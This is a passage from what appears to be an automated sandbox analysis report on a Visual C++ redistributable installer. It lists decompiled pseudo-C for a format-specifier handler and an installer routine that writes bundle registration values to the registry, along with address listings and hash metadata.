					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                                                                          0x0003fe15
                                                                          0x0003fe15
                                                                          0x0003fe15
                                                                          0x0003fe1b
                                                                          0x0003fea2
                                                                          0x0003fea4
                                                                          0x0003fea6
                                                                          0x00040225
                                                                          0x00040225
                                                                          0x00041016
                                                                          0x00041016
                                                                          0x0003feac
                                                                          0x0003feb2
                                                                          0x0003ff39
                                                                          0x0003ff3b
                                                                          0x0003ff3d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ff43
                                                                          0x0003ff49
                                                                          0x0003ffd0
                                                                          0x0003ffd2
                                                                          0x0003ffd4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ffda
                                                                          0x0003ffe0
                                                                          0x00040067
                                                                          0x00040069
                                                                          0x0004006b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040077
                                                                          0x000400ff
                                                                          0x00040101
                                                                          0x00040103
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040109
                                                                          0x0004010f
                                                                          0x00040196
                                                                          0x00040198
                                                                          0x0004019a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000401a0
                                                                          0x000401a6
                                                                          0x0004021d
                                                                          0x0004021f
                                                                          0x00040221
                                                                          0x00040223
                                                                          0x00040223
                                                                          0x00000000
                                                                          0x00040221
                                                                          0x000401af
                                                                          0x000401b1
                                                                          0x000401c5
                                                                          0x000401cd
                                                                          0x000401cf
                                                                          0x000401e3
                                                                          0x000401eb
                                                                          0x000401ed
                                                                          0x00040201
                                                                          0x00040209
                                                                          0x0004020b
                                                                          0x00040214
                                                                          0x00040214
                                                                          0x00000000
                                                                          0x0004020b
                                                                          0x000401f6
                                                                          0x000401ff
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000401ff
                                                                          0x000401d8
                                                                          0x000401e1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000401e1
                                                                          0x000401ba
                                                                          0x000401c3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000401c3
                                                                          0x0004011c
                                                                          0x0004011e
                                                                          0x00040136
                                                                          0x0004013e
                                                                          0x00040140
                                                                          0x00040158
                                                                          0x00040160
                                                                          0x00040162
                                                                          0x0004017a
                                                                          0x00040182
                                                                          0x00040184
                                                                          0x0004018d
                                                                          0x0004018d
                                                                          0x00000000
                                                                          0x00040184
                                                                          0x0004016b
                                                                          0x00040174
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040174
                                                                          0x00040149
                                                                          0x00040152
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040152
                                                                          0x00040127
                                                                          0x00040130
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040130
                                                                          0x00040085
                                                                          0x00040087
                                                                          0x0004009f
                                                                          0x000400a7
                                                                          0x000400a9
                                                                          0x000400c1
                                                                          0x000400c9
                                                                          0x000400cb
                                                                          0x000400e3
                                                                          0x000400eb
                                                                          0x000400ed
                                                                          0x000400f6
                                                                          0x000400f6
                                                                          0x00000000
                                                                          0x000400ed
                                                                          0x000400d4
                                                                          0x000400dd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000400dd
                                                                          0x000400b2
                                                                          0x000400bb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000400bb
                                                                          0x00040090
                                                                          0x00040099
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040099
                                                                          0x0003ffed
                                                                          0x0003ffef
                                                                          0x00040007
                                                                          0x0004000f
                                                                          0x00040011
                                                                          0x00040029
                                                                          0x00040031
                                                                          0x00040033
                                                                          0x0004004b
                                                                          0x00040053
                                                                          0x00040055
                                                                          0x0004005e
                                                                          0x0004005e
                                                                          0x00000000
                                                                          0x00040055
                                                                          0x0004003c
                                                                          0x00040045
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040045
                                                                          0x0004001a
                                                                          0x00040023
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040023
                                                                          0x0003fff8
                                                                          0x00040001
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040001
                                                                          0x0003ff56
                                                                          0x0003ff58
                                                                          0x0003ff70
                                                                          0x0003ff78
                                                                          0x0003ff7a
                                                                          0x0003ff92
                                                                          0x0003ff9a
                                                                          0x0003ff9c
                                                                          0x0003ffb4
                                                                          0x0003ffbc
                                                                          0x0003ffbe
                                                                          0x0003ffc7
                                                                          0x0003ffc7
                                                                          0x00000000
                                                                          0x0003ffbe
                                                                          0x0003ffa5
                                                                          0x0003ffae
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ffae
                                                                          0x0003ff83
                                                                          0x0003ff8c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ff8c
                                                                          0x0003ff61
                                                                          0x0003ff6a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ff6a
                                                                          0x0003febf
                                                                          0x0003fec1
                                                                          0x0003fed9
                                                                          0x0003fee1
                                                                          0x0003fee3
                                                                          0x0003fefb
                                                                          0x0003ff03
                                                                          0x0003ff05
                                                                          0x0003ff1d
                                                                          0x0003ff25
                                                                          0x0003ff27
                                                                          0x0003ff30
                                                                          0x0003ff30
                                                                          0x00000000
                                                                          0x0003ff27
                                                                          0x0003ff0e
                                                                          0x0003ff17
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ff17
                                                                          0x0003feec
                                                                          0x0003fef5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003fef5
                                                                          0x0003feca
                                                                          0x0003fed3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003fed3
                                                                          0x0003fe28
                                                                          0x0003fe2a
                                                                          0x0003fe42
                                                                          0x0003fe4a
                                                                          0x0003fe4c
                                                                          0x0003fe64
                                                                          0x0003fe6c
                                                                          0x0003fe6e
                                                                          0x0003fe86
                                                                          0x0003fe8e
                                                                          0x0003fe90
                                                                          0x0003fe99
                                                                          0x0003fe99
                                                                          0x00000000
                                                                          0x0003fe90
                                                                          0x0003fe77
                                                                          0x0003fe80
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003fe80
                                                                          0x0003fe55
                                                                          0x0003fe5e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003fe5e
                                                                          0x0003fe33
                                                                          0x0003fe3c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction ID: 03287ecaad9679de8a8e4bad73453f8e5672bdf9f3f8490649ce785e8d0d677a
                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction Fuzzy Hash: 84C1C2722050A309DFAD4A79D53813EBAE16FA27B131A57BDD8B3DB1D4EE30C524D620
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00042D50 Relevance: .2, Instructions: 237COMMONLIBRARYCODECrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			E00042D50(void* __ecx, void* __edi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t102;
				void* _t104;
				signed int _t110;
				unsigned int _t112;
				signed char _t114;
				unsigned int _t122;
				void* _t123;
				signed int _t124;
				short _t125;
				void* _t128;
				void* _t129;
				void* _t130;
				signed int _t131;
				void* _t132;
				void* _t134;
				void* _t135;

				_t123 = __edi;
				_t52 =  *0x7a008; // 0xfbf51acb
				_v8 = _t52 ^ _t131;
				_t130 = __ecx;
				_t102 = 0;
				_t122 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t104 = 0x58;
				_t134 = _t54 - 0x64;
				if(_t134 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00043782(_t130);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t130 + 0x30)) - _t102;
								if( *((intOrPtr*)(_t130 + 0x30)) != _t102) {
									L71:
									L72:
									return E0003DE36(_t102, _v8 ^ _t131, _t122, _t123, _t130);
								}
								_t122 =  *(_t130 + 0x20);
								_push(_t123);
								_v16 = _t102;
								_t60 = _t122 >> 4;
								_v12 = _t102;
								_t124 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t110 =  *(_t130 + 0x32) & 0x0000ffff;
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L48:
										_t62 = _t122 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t110 - 0x61;
											if(_t110 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t125 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t131 + _t102 * 2 - 0xc)) = _t125;
													__eflags = _t110 - _t65;
													if(_t110 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t131 + _t102 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t102 = _t102 + 2;
														__eflags = _t102;
														L62:
														_t128 =  *((intOrPtr*)(_t130 + 0x24)) -  *((intOrPtr*)(_t130 + 0x38)) - _t102;
														__eflags = _t122 & 0x0000000c;
														if((_t122 & 0x0000000c) == 0) {
															E0004209A(_t130 + 0x448, 0x20, _t128, _t130 + 0x18);
															_t132 = _t132 + 0x10;
														}
														E00043A9D(_t130 + 0x448,  &_v16, _t102, _t130 + 0x18,  *((intOrPtr*)(_t130 + 0xc)));
														_t112 =  *(_t130 + 0x20);
														_t102 = _t130 + 0x18;
														_t75 = _t112 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t114 = _t112 >> 2;
															__eflags = _t114 & 0x00000001;
															if((_t114 & 0x00000001) == 0) {
																E0004209A(_t130 + 0x448, 0x30, _t128, _t102);
																_t132 = _t132 + 0x10;
															}
														}
														E0004397F(_t130, 0);
														__eflags =  *_t102;
														if( *_t102 >= 0) {
															_t78 =  *(_t130 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E0004209A(_t130 + 0x448, 0x20, _t128, _t102);
															}
														}
														_pop(_t123);
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t110 - _t86;
													if(_t110 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t129 = 0x41;
											__eflags = _t110 - _t129;
											if(_t110 == _t129) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t110 - _t88;
									if(_t110 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t122 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t122;
									if((1 & _t122) == 0) {
										_t92 = _t122 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t124;
										L45:
										_t102 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t102);
							_push(0xa);
							L29:
							_t56 = E0004351A(_t130, _t123, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E000436F7(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00043280(_t102, _t130);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t130 + 0x20;
						 *_t3 =  *(_t130 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00043664(__ecx, _t122);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E000436D8(__ecx);
					goto L10;
				}
				if(_t134 == 0) {
					goto L27;
				}
				_t135 = _t54 - _t104;
				if(_t135 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E000430C3(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00043482(_t130, __eflags, _t102);
					goto L10;
				}
				if(_t135 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t122) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}












































                                                                          0x00042d50
                                                                          0x00042d58
                                                                          0x00042d5f
                                                                          0x00042d64
                                                                          0x00042d66
                                                                          0x00042d6a
                                                                          0x00042d6d
                                                                          0x00042d71
                                                                          0x00042d72
                                                                          0x00042d75
                                                                          0x00042de2
                                                                          0x00042de5
                                                                          0x00042e34
                                                                          0x00042e34
                                                                          0x00042e37
                                                                          0x00042da3
                                                                          0x00042da5
                                                                          0x00042daa
                                                                          0x00042dac
                                                                          0x00042e52
                                                                          0x00042e55
                                                                          0x00042f9b
                                                                          0x00042f9d
                                                                          0x00042fac
                                                                          0x00042fac
                                                                          0x00042e5b
                                                                          0x00042e60
                                                                          0x00042e63
                                                                          0x00042e66
                                                                          0x00042e6a
                                                                          0x00042e70
                                                                          0x00042e71
                                                                          0x00042e73
                                                                          0x00042e9d
                                                                          0x00042e9d
                                                                          0x00042ea1
                                                                          0x00042ea4
                                                                          0x00042eae
                                                                          0x00042eb0
                                                                          0x00042eb3
                                                                          0x00042eb5
                                                                          0x00042ebb
                                                                          0x00042ebb
                                                                          0x00042ebd
                                                                          0x00042ebd
                                                                          0x00042ec0
                                                                          0x00042ece
                                                                          0x00042ece
                                                                          0x00042ed0
                                                                          0x00042ed2
                                                                          0x00042ed3
                                                                          0x00042ed5
                                                                          0x00042edb
                                                                          0x00042edd
                                                                          0x00042ede
                                                                          0x00042ee3
                                                                          0x00042ee6
                                                                          0x00042ef4
                                                                          0x00042ef4
                                                                          0x00042ef6
                                                                          0x00042ef6
                                                                          0x00042f01
                                                                          0x00042f03
                                                                          0x00042f08
                                                                          0x00042f08
                                                                          0x00042f0b
                                                                          0x00042f11
                                                                          0x00042f13
                                                                          0x00042f16
                                                                          0x00042f26
                                                                          0x00042f2b
                                                                          0x00042f2b
                                                                          0x00042f40
                                                                          0x00042f45
                                                                          0x00042f48
                                                                          0x00042f4d
                                                                          0x00042f50
                                                                          0x00042f52
                                                                          0x00042f54
                                                                          0x00042f57
                                                                          0x00042f5a
                                                                          0x00042f67
                                                                          0x00042f6c
                                                                          0x00042f6c
                                                                          0x00042f5a
                                                                          0x00042f73
                                                                          0x00042f78
                                                                          0x00042f7b
                                                                          0x00042f80
                                                                          0x00042f83
                                                                          0x00042f85
                                                                          0x00042f92
                                                                          0x00042f97
                                                                          0x00042f85
                                                                          0x00042f9a
                                                                          0x00000000
                                                                          0x00042f9a
                                                                          0x00042eea
                                                                          0x00042eeb
                                                                          0x00042eee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042ef0
                                                                          0x00000000
                                                                          0x00042ef0
                                                                          0x00042ed7
                                                                          0x00042ed9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042ed9
                                                                          0x00042ec4
                                                                          0x00042ec5
                                                                          0x00042ec8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042eca
                                                                          0x00000000
                                                                          0x00042eca
                                                                          0x00000000
                                                                          0x00042eb7
                                                                          0x00042ea8
                                                                          0x00042ea9
                                                                          0x00042eac
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042eac
                                                                          0x00042e77
                                                                          0x00042e7a
                                                                          0x00042e7c
                                                                          0x00042e87
                                                                          0x00042e89
                                                                          0x00042e91
                                                                          0x00042e93
                                                                          0x00042e95
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042e97
                                                                          0x00042e9b
                                                                          0x00042e9b
                                                                          0x00000000
                                                                          0x00042e9b
                                                                          0x00042e8b
                                                                          0x00042e80
                                                                          0x00042e80
                                                                          0x00042e81
                                                                          0x00000000
                                                                          0x00042e81
                                                                          0x00042e7e
                                                                          0x00000000
                                                                          0x00042e7e
                                                                          0x00042db2
                                                                          0x00000000
                                                                          0x00042db2
                                                                          0x00042e3e
                                                                          0x00042e3e
                                                                          0x00042e41
                                                                          0x00042e13
                                                                          0x00042e13
                                                                          0x00042e14
                                                                          0x00042e16
                                                                          0x00042e18
                                                                          0x00000000
                                                                          0x00042e18
                                                                          0x00042e43
                                                                          0x00042e46
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042e4c
                                                                          0x00042dbb
                                                                          0x00042dbb
                                                                          0x00000000
                                                                          0x00042dbb
                                                                          0x00042de7
                                                                          0x00042e2a
                                                                          0x00000000
                                                                          0x00042e2a
                                                                          0x00042de9
                                                                          0x00042dec
                                                                          0x00042e1f
                                                                          0x00042e21
                                                                          0x00000000
                                                                          0x00042e21
                                                                          0x00042dee
                                                                          0x00042df1
                                                                          0x00042e0f
                                                                          0x00042e0f
                                                                          0x00042e0f
                                                                          0x00042e0f
                                                                          0x00000000
                                                                          0x00042e0f
                                                                          0x00042df3
                                                                          0x00042df6
                                                                          0x00042e08
                                                                          0x00000000
                                                                          0x00042e08
                                                                          0x00042df8
                                                                          0x00042dfb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042dff
                                                                          0x00000000
                                                                          0x00042dff
                                                                          0x00042d77
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042d7d
                                                                          0x00042d7f
                                                                          0x00042dbf
                                                                          0x00042dbf
                                                                          0x00042dc2
                                                                          0x00042ddb
                                                                          0x00000000
                                                                          0x00042ddb
                                                                          0x00042dc4
                                                                          0x00042dc4
                                                                          0x00042dc7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042dca
                                                                          0x00042dcd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042dcf
                                                                          0x00042dd2
                                                                          0x00000000
                                                                          0x00042dd2
                                                                          0x00042d81
                                                                          0x00042db9
                                                                          0x00000000
                                                                          0x00042db9
                                                                          0x00042d85
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042d8e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042d93
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042d98
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042da1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ff3959ed15a08cfa407d5d089e5b58bed8c4fb1a2e94a0216a38959a7c05694d
                                                                          • Instruction ID: 4e696a5d344e8a31f4a3c597cfd317005685ea1c0f53bbbdca52c53e3b005ecf
                                                                          • Opcode Fuzzy Hash: ff3959ed15a08cfa407d5d089e5b58bed8c4fb1a2e94a0216a38959a7c05694d
                                                                          • Instruction Fuzzy Hash: FA615BF1B0070966DAB899298895BFE73D4EF51300FD40939F983DB282DA51ED86C35D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001FE26 Relevance: 81.0, APIs: 1, Strings: 45, Instructions: 476registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 81%
                                                                          			E0001FE26(void* __ebx, char* __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int _a28, unsigned int _a32) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* __edi;
				unsigned int _t136;
				char* _t137;
				char* _t138;
				signed int _t147;
				char* _t155;
				signed int _t156;
				char* _t159;
				signed int _t160;
				char* _t162;
				char* _t163;
				intOrPtr _t164;
				void* _t193;
				char* _t195;
				signed int _t201;
				unsigned int _t206;
				intOrPtr* _t207;
				char* _t208;
				void* _t209;
				void* _t210;

				_t205 = __edx;
				_t197 = __ecx;
				_t193 = __ebx;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_t207 = _a8;
				_push(E00023C30( *((intOrPtr*)(_t207 + 8))));
				_push(_a20);
				E0001550F(3, 0x20000172,  *((intOrPtr*)(_t207 + 0x50)));
				_t210 = _t209 + 0x14;
				if((_a20 & 0x00000001) == 0) {
					L3:
					_t208 = E00050A88( *((intOrPtr*)(_t207 + 0x4c)),  *((intOrPtr*)(_t207 + 0x50)), 0x20006,  &_v8);
					__eflags = _t208;
					if(_t208 >= 0) {
						__eflags = _a20 & 0x00000002;
						_push(_t193);
						if((_a20 & 0x00000002) == 0) {
							L76:
							__eflags = _a20 & 0x00000004;
							if((_a20 & 0x00000004) == 0) {
								L87:
								__eflags = _a24 - 1;
								if(__eflags != 0) {
									L90:
									_t208 = E0001F09D(_t205, __eflags, _t207, _v8, 1, 0);
									__eflags = _t208;
									if(_t208 < 0) {
										_push("Failed to update resume mode.");
										goto L92;
									}
								} else {
									_t208 = E00038356(_t197, _t205, _t207);
									__eflags = _t208;
									if(__eflags >= 0) {
										goto L90;
									} else {
										_push("Failed to register the bundle dependency key.");
										goto L92;
									}
								}
							} else {
								_t136 = _a32;
								_t197 = (_t136 << 0x00000020 | _a28) >> 0xa;
								_t137 = _t136 >> 0xa;
								__eflags = _t137;
								if(__eflags < 0) {
									goto L87;
								} else {
									if(__eflags > 0) {
										L81:
										_t138 = 0xffffffff;
										if(__eflags <= 0) {
											__eflags = _t197 - _t138;
											if(_t197 <= _t138) {
												goto L83;
											}
										}
										goto L84;
									} else {
										__eflags = _t197;
										if(_t197 == 0) {
											goto L87;
										} else {
											__eflags = _t137;
											if(__eflags < 0) {
												L83:
												_t138 = _t197;
											} else {
												goto L81;
											}
											L84:
											_t195 = L"EstimatedSize";
											_t208 = E00051344(_v8, _t195, _t138);
											__eflags = _t208;
											if(_t208 >= 0) {
												goto L87;
											} else {
												goto L85;
											}
										}
									}
								}
							}
						} else {
							_t195 = L"BundleCachePath";
							_t208 = E00051392(_t197, _t205, _v8, _t195,  *((intOrPtr*)(_t207 + 0x54)));
							__eflags = _t208;
							if(_t208 < 0) {
								L85:
								_push(_t195);
								goto L86;
							} else {
								_t195 = L"BundleUpgradeCode";
								_t208 = E0005143C(_v8, _t195,  *((intOrPtr*)(_t207 + 0x20)),  *((intOrPtr*)(_t207 + 0x24)));
								__eflags = _t208;
								if(_t208 < 0) {
									goto L85;
								} else {
									_t195 = L"BundleAddonCode";
									_t208 = E0005143C(_v8, _t195,  *((intOrPtr*)(_t207 + 0x28)),  *((intOrPtr*)(_t207 + 0x2c)));
									__eflags = _t208;
									if(_t208 < 0) {
										goto L85;
									} else {
										_t195 = L"BundleDetectCode";
										_t208 = E0005143C(_v8, _t195,  *((intOrPtr*)(_t207 + 0x18)),  *((intOrPtr*)(_t207 + 0x1c)));
										__eflags = _t208;
										if(_t208 < 0) {
											goto L85;
										} else {
											_t195 = L"BundlePatchCode";
											_t208 = E0005143C(_v8, _t195,  *((intOrPtr*)(_t207 + 0x30)),  *((intOrPtr*)(_t207 + 0x34)));
											__eflags = _t208;
											if(_t208 < 0) {
												goto L85;
											} else {
												_t201 =  *(_t207 + 0x38);
												_t195 = L"BundleVersion";
												_t206 =  *(_t207 + 0x3c);
												_push(_t201 & 0x0000ffff);
												_t147 = _t206;
												_v20 = _t206;
												_t202 = (_t147 << 0x00000020 | _t201) >> 0x10;
												_push((_t147 << 0x00000020 | _t201) >> 0x10 & 0x0000ffff);
												_push(_t206 & 0x0000ffff);
												_t205 = _t206 >> 0x10;
												_t208 = E00051587((_t147 << 0x00000020 | _t201) >> 0x10, _t206 >> 0x10, _v8, _t195, L"%hu.%hu.%hu.%hu", _t206 >> 0x10);
												_t210 = _t210 + 0x1c;
												__eflags = _t208;
												if(_t208 < 0) {
													goto L85;
												} else {
													__eflags =  *(_t207 + 0x44);
													if( *(_t207 + 0x44) == 0) {
														L14:
														__eflags =  *(_t207 + 0x14);
														if( *(_t207 + 0x14) == 0) {
															L16:
															_t195 = L"EngineVersion";
															_t208 = E00051587(_t202, _t205, _v8, _t195, L"%hs", "3.10.4.4718");
															_t210 = _t210 + 0x10;
															__eflags = _t208;
															if(_t208 < 0) {
																goto L85;
															} else {
																_t195 = L"DisplayIcon";
																_t208 = E00051587(_t202, _t205, _v8, _t195, L"%s,0",  *((intOrPtr*)(_t207 + 0x54)));
																_t210 = _t210 + 0x10;
																__eflags = _t208;
																if(_t208 < 0) {
																	goto L85;
																} else {
																	_t196 = _a12;
																	_t155 = E0001E8CE(_t202, _t207, _a12,  &_v12);
																	__eflags = _t155;
																	_t156 = _v12;
																	if(_t155 < 0) {
																		_t156 =  *((intOrPtr*)(_t207 + 0x60));
																	}
																	_t208 = E00051392(_t202, _t205, _v8, L"DisplayName", _t156);
																	__eflags = _t208;
																	if(_t208 >= 0) {
																		__eflags =  *(_t207 + 0x64);
																		if( *(_t207 + 0x64) == 0) {
																			L25:
																			_t159 = E0001E866(_t202, _t207, _t196,  &_v16);
																			__eflags = _t159;
																			_t160 = _v16;
																			if(_t159 < 0) {
																				_t160 =  *((intOrPtr*)(_t207 + 0x68));
																			}
																			_t208 = E00051392(_t202, _t205, _v8, L"Publisher", _t160);
																			__eflags = _t208;
																			if(_t208 >= 0) {
																				__eflags =  *(_t207 + 0x6c);
																				if( *(_t207 + 0x6c) == 0) {
																					L32:
																					__eflags =  *(_t207 + 0x70);
																					if( *(_t207 + 0x70) == 0) {
																						L35:
																						__eflags =  *(_t207 + 0x74);
																						if( *(_t207 + 0x74) == 0) {
																							L38:
																							__eflags =  *(_t207 + 0x78);
																							if( *(_t207 + 0x78) == 0) {
																								L41:
																								__eflags =  *(_t207 + 0x7c);
																								if( *(_t207 + 0x7c) == 0) {
																									L46:
																									_t162 =  *(_t207 + 0x80);
																									__eflags = _t162;
																									if(_t162 == 0) {
																										L49:
																										_t163 =  *(_t207 + 0x84);
																										__eflags = _t163;
																										if(_t163 == 0) {
																											L52:
																											_t164 =  *((intOrPtr*)(_t207 + 0x88));
																											__eflags = _t164 - 1;
																											if(_t164 != 1) {
																												__eflags = _t164 - 2;
																												if(_t164 == 2) {
																													goto L60;
																												} else {
